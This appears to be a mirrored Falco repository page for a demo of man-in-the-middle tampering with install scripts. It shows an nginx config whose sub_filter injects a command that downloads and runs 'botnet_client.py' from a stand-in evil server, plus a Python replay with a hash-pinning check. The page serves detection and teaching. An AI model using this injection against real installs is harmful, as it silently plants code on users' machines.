mirror of
https://github.com/falcosecurity/falco.git
synced 2026-04-04 11:02:16 +00:00
Adding docker-compose based example of man-in-the-middle attack against installation scripts and how it can be detected using sysdig falco. The docker-compose environment starts a good web server, compromised nginx installation, evil web server, and a copy of sysdig falco. The README walks through the process of compromising a client by using curl http://localhost/get-software.sh | bash and detecting the compromise using ./fbash. The fbash program included in this example fixes https://github.com/draios/falco/issues/46.
13 lines
351 B
Nginx Configuration File
```nginx
http {
    server {
        location / {
            sub_filter_types '*';
            sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
            sub_filter_once off;
            proxy_pass http://apache:80;
        }
    }
}

events {
}
```
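To make the effect of the `sub_filter` directive above concrete from the client's side, here is an added example (not part of this commit or of the Falco project) that replays the same substitution on a constructed stand-in for `get-software.sh` and shows the integrity check that `curl ... | bash` skips: the install script's contents and the pinned hash are assumptions, only the match/replacement pair comes from the page.

```python
import hashlib

# Constructed sample install script standing in for get-software.sh
# (the real script served in the example is not reproduced on this page).
GOOD_SCRIPT = (
    "#!/bin/bash\n"
    "function install_deb {\n"
    "    apt-get install -y example-package\n"
    "}\n"
    "install_deb\n"
)

# Match / replacement pair taken from the compromised nginx sub_filter directive.
MATCH = "function install_deb {"
REPLACEMENT = (
    "curl -so ./botnet_client.py http://localhost:9090/botnet_client.py "
    "&& python ./botnet_client.py &\nfunction install_deb {"
)


def apply_sub_filter(body: str, match: str, replacement: str, once: bool = True) -> str:
    """Mimic nginx sub_filter on a proxied response body.

    nginx rewrites only the first occurrence unless `sub_filter_once off;`
    is set, in which case every occurrence is rewritten (count=-1 below).
    """
    return body.replace(match, replacement, 1 if once else -1)


def sha256_hex(body: str) -> str:
    return hashlib.sha256(body.encode()).hexdigest()


def verify_script(body: str, expected_sha256: str) -> bool:
    """The check a client should run before handing a script to bash.

    `curl ... | bash` has no such step: the proxy's injected line executes as
    soon as it streams in.  Pinning the publisher's hash (obtained out of band
    or over TLS) makes the tampering on this page detectable before execution.
    """
    return sha256_hex(body) == expected_sha256


if __name__ == "__main__":
    pinned = sha256_hex(GOOD_SCRIPT)  # what the publisher would advertise
    served = apply_sub_filter(GOOD_SCRIPT, MATCH, REPLACEMENT, once=False)
    print("body seen by the client:\n" + served)
    print("integrity check passes:", verify_script(served, pinned))
```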